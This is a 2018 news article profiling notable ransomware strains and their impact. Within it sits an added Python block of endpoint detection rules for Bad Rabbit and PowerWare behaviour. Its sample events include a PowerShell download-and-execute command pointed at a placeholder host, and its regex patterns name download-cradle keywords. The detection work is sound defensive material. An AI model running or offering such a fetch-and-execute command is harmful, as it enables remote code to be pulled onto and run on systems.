The worst types of ransomware attacks

The first known ransomware attack was called the AIDS Trojan and was unleashed via floppy disks in 1989, but it wasn't until the global panic caused by WannaCry in 2017 that the malware entered the public consciousness.

The rise of bitcoin as an almost untraceable payment method and the growing body of evidence that digital extortion could be profitable made ransomware a common cyber threat by 2016, according to Kaspersky Lab. It continued to wreak havoc in 2017 and its surge shows little sign of respite.

Ransomware is difficult to stop even for Windows computers running antivirus, although that situation is improving. The only reliable defence is a backup, but even that can come under attack if it can be reached from the infected PC.

As the threat is unlikely to subside in the foreseeable future, we look at the most deadly strains of ransomware to have emerged so far.


NotPetya

The NotPetya ransomware was based on the same EternalBlue SMB exploit as WannaCry, combined with EternalRomance, also stolen from the NSA. NotPetya works its way into a system's master boot record and prevents the machine from booting.

It was an offshoot of the Petya malware, first discovered in 2016, but modified to spread quickly. NotPetya first targeted companies in Ukraine, including that country's national bank, followed by infections across Europe and in the United States. According to analysts, the attack most likely originated in Russia – and was first unleashed on Ukraine during the Constitution Day holiday.

Security experts suggested that because the demand for payment was relatively low, the intention of the malware designers was probably to cause damage rather than generate income. Infosec vendor SentinelOne said that the malware was "more akin to a wiper, which is generally regarded as a malware responsible for destroying data on the target’s hard disk".

High-profile businesses were also hit including Maersk Line and WPP, as well as logistics business DHL – and even the Cadbury’s factory in Tasmania.

The White House castigated Russia for the attack, claiming that it caused billions of dollars in damage in total. British defence secretary Gavin Williamson accused Russia of "ripping up the rule book" for the attack.

Bad Rabbit

Following in the footsteps of WannaCry and NotPetya was Bad Rabbit, which when it was launched quickly infected Russian websites such as news agency Interfax plus an airport in Ukraine and a metro system in Kiev. US officials said attacks had been reported from "many countries around the world".

A malware dropper was hidden on legitimate websites, but there was no exploit in the code, meaning the user had to manually execute the dropper, which was disguised as an installer for Adobe Flash. It would save a malicious DLL as infpub.dat and launch it with the rundll32 component.

Jaff

The anatomy of the Jaff ransomware is similar to Locky's, but it demanded more than $3,000 from its victims to unlock files – with no guarantee, of course, that they'd get them back.

An email campaign propagated by the Necurs botnet spread the ransomware at the incredible rate of 5 million emails per hour, typically carrying malicious PDF attachments.

Jaff, which was capable of encrypting offline without the need for a command and control server, targets 423 different file extensions – everything from .xlsx and .doc to .mpeg and .txt.

Fortunately, Kaspersky has provided a decryptor for free.

GandCrab

A new strain of ransomware called GandCrab was discovered early in January 2018. The malware takes an unusual route to infection, via the RIG and GrandSoft exploit kits, and demands a cryptocurrency fee of 1.5 Dash (just under £500 at the time of writing) for the return of any files.

Researchers from Australian cybersecurity firm LMNTRIX told SC Media that GandCrab was being marketed as a ransomware-as-a-service package to budding cyber criminals, who could split the profits with the developers 60:40.

Larger partners have the option to increase their share to 70 percent, but the developers behind the ransomware have ruled out any targets in the Commonwealth of Independent States - the confederation of former Soviet Republics including Russia.

The lack of reported attacks thus far suggests the business is yet to take off.

GoldenEye - taking parts of Ukraine offline

The ransomware attacks reported in Ukraine, which hit the national bank, the state power company and Kiev's largest airport on June 27, 2017, were, according to Bitdefender Labs, caused by GoldenEye ransomware, which is thought to be a mixture of Petya and another ransomware called Mischa. (See Malwarebytes.)

And while ransomware usually encrypts files, Petya, variants of it and GoldenEye target whole computer systems. Like Petya, GoldenEye will prevent computer systems from being booted up and from victims retrieving any stored data.

When the user reboots, instead of Windows they could see a skull and crossbones splash screen with a ransom demand. Effectively, the attackers are holding both the files and the entire system hostage by encrypting the Master File Table, making the files inaccessible.

However, unlike Petya, GoldenEye will not provide any help for victims to retrieve the decryption keys from the computer systems.

Like the recent global WannaCry ransomware attacks which affected NHS England, GoldenEye is believed to use the EternalBlue exploit, which exploited vulnerabilities in the Server Message Block protocol to spread the infection through file sharing networks during the NHS attacks.

WannaCry - cryptoworm targeting Windows causes havoc to NHS

Europol has described the WannaCry ransomware, which shut down hospital infrastructure all over the UK and uses a leaked exploit first developed by the National Security Agency, as unprecedented in scale.

The attack was launched on Friday 12 May and quickly spread to more than 200,000 systems around the world. Security researcher Kafeine found that WannaCry contained code based on the NSA’s EternalBlue exploit, which was leaked earlier this year by the group calling itself the Shadow Brokers. According to BleepingComputer, EternalBlue exploits a vulnerability in the Server Message Block protocol to spread through file sharing networks. Malwarebytes Labs reports that the worm creates two threads, one to scan for hosts on the local network and the other to scan for hosts on the internet. On infected machines the malware demands a payment of up to $600 to decrypt the files.

Microsoft had patched the vulnerability in update MS17-010 in March this year, but unpatched systems, or those running older versions of Windows without Windows Update enabled, were still open to infection. The company took the unusual step of releasing another patch for older operating systems, including the generally unsupported Windows XP.

But by that time hospitals, doctor’s surgeries and accident and emergency wards in the UK had been affected by the attack and some were even reportedly turning patients away. Home secretary Amber Rudd confirmed that one in five NHS England trusts had been hit by the attack, but insisted no patient data had been compromised.

Elsewhere, organisations hit by the attack included Telefonica in Spain, Renault in France, and delivery company FedEx in the USA, as well as China’s state oil company and railways in Germany. Russia was believed to have most instances of the attack.

Security researchers warn that another wave of attacks is likely, and that the code could easily be evolved to become more sophisticated and harder to stop. It’s suspected that an organised criminal group was behind the attack.

Locky – well engineered, ruthless, clever

The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware can get. Locky’s creators seem to have thought of everything: it encrypts not only a wide range of data files but also Bitcoin wallets and Windows Volume Snapshot Service (VSS) files, in case users try to restore files from them. It reaches out to attached shares and even other PCs and servers, uses strong encryption and has found several high-profile victims.

Petya - locking down the whole system

Unlike other ransomware listed, Petya doesn't mess around with file encryption; instead, it targets whole computer systems.

For a Petya attack to succeed it needs to overwrite the Master Boot Record (MBR), causing a full blue screen of death crash.

This means that when the victim turns on their machine, they'll be met with a skull and crossbones landing page and, of course, a ransom note.

Crysis - Locky copycat with big ambitions

First detected by ESET in early 2016, Crysis styles itself on Locky in that it encrypts shadow copies and every file it can find, in some cases including system files. This rather odd behaviour means that the infected PC can become inoperable. It attempts to elevate its privileges to admin level by stealing available logins and even steals files, including user credentials. It also targets VMware virtual machines. ESET has a decryptor for early versions.

zCrypt – ransomware that behaves like a virus

zCrypt tries the unusual technique of spreading as a virus. This means that it doesn’t rely on malicious emails to find victims and can spread on USB sticks, creating a custom autorun.inf that allows it to execute automatically when the stick is plugged into a second machine. Instead of automatically encrypting all the files it can find, it simply detects important directories and encrypts files that are changed. It scrambles files first to make recovery impossible.

PowerWare – PowerShell hijacker

Discovered by security firm Carbon Black, this one is interesting because it is aimed at businesses using Microsoft Word and the PowerShell scripting interface. This malware’s innovation is that, after tempting the user to enable macros to view a booby-trapped Word attachment, it runs without files, hooking PowerShell to download a malicious script. Writing no files makes its activity hard to detect when it encrypts files. Carbon Black says that recovery is possible.
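As an added example (not code from the article or from any vendor it cites), the following Python turns two behaviours described here into endpoint detection rules: the Bad Rabbit dropper saving infpub.dat and launching it through rundll32, and PowerWare's Word macro handing off to PowerShell to download its script. The process-event fields, the rule names and the download-cradle keywords are this example's assumptions, and the log records it runs over are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style); fields are assumed."""
    host: str
    parent_image: str
    image: str
    command_line: str

def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

# (rule name, predicate). The download-cradle keywords are this example's choice.
RULES = [
    # Bad Rabbit: dropper saves its payload as infpub.dat and runs it via rundll32.
    ("bad_rabbit_infpub_dll", lambda e: _base(e.image) == "rundll32.exe"
     and "infpub.dat" in e.command_line.lower()),
    # PowerWare: a Word macro hands off to PowerShell ...
    ("office_spawns_powershell", lambda e: _base(e.image) == "powershell.exe"
     and _base(e.parent_image) in {"winword.exe", "excel.exe"}),
    # ... which pulls its script over the network instead of writing a file.
    ("powershell_download_cradle", lambda e: _base(e.image) == "powershell.exe"
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
                   e.command_line, re.I) is not None),
]

def detect(events):
    """Return (host, rule_name, command_line) for every rule an event trips."""
    return [(e.host, name, e.command_line)
            for e in events for name, pred in RULES if pred(e)]

# Constructed sample events: one per behaviour above plus two benign look-alikes.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Users\a\Downloads\install_flash_player.exe",
              r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\infpub.dat,#1"),
    ProcEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/s.ps1')\""),
    ProcEvent("ws03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent("ws04", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
]
```

Only ws01 and ws02 trip rules; the Control Panel applet launch and the scheduled backup script on ws03 and ws04 pass, which is the false-positive check worth keeping when adapting these patterns to real telemetry.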

HydraCrypt – ransomware can be beaten

An offshoot of the CrypBoss ransomware, HydraCrypt is notable for being pushed by the highly active Angler exploit kit, which suddenly and mysteriously disappeared in June 2016. HydraCrypt is perhaps best known for the battle between its creators and a researcher called Fabian Wosar. So far, Wosar is winning hands down, having released decryptors for successive versions of this family, and a decryptor is available to help victims recover.

Copyright © 2018 IDG Communications, Inc.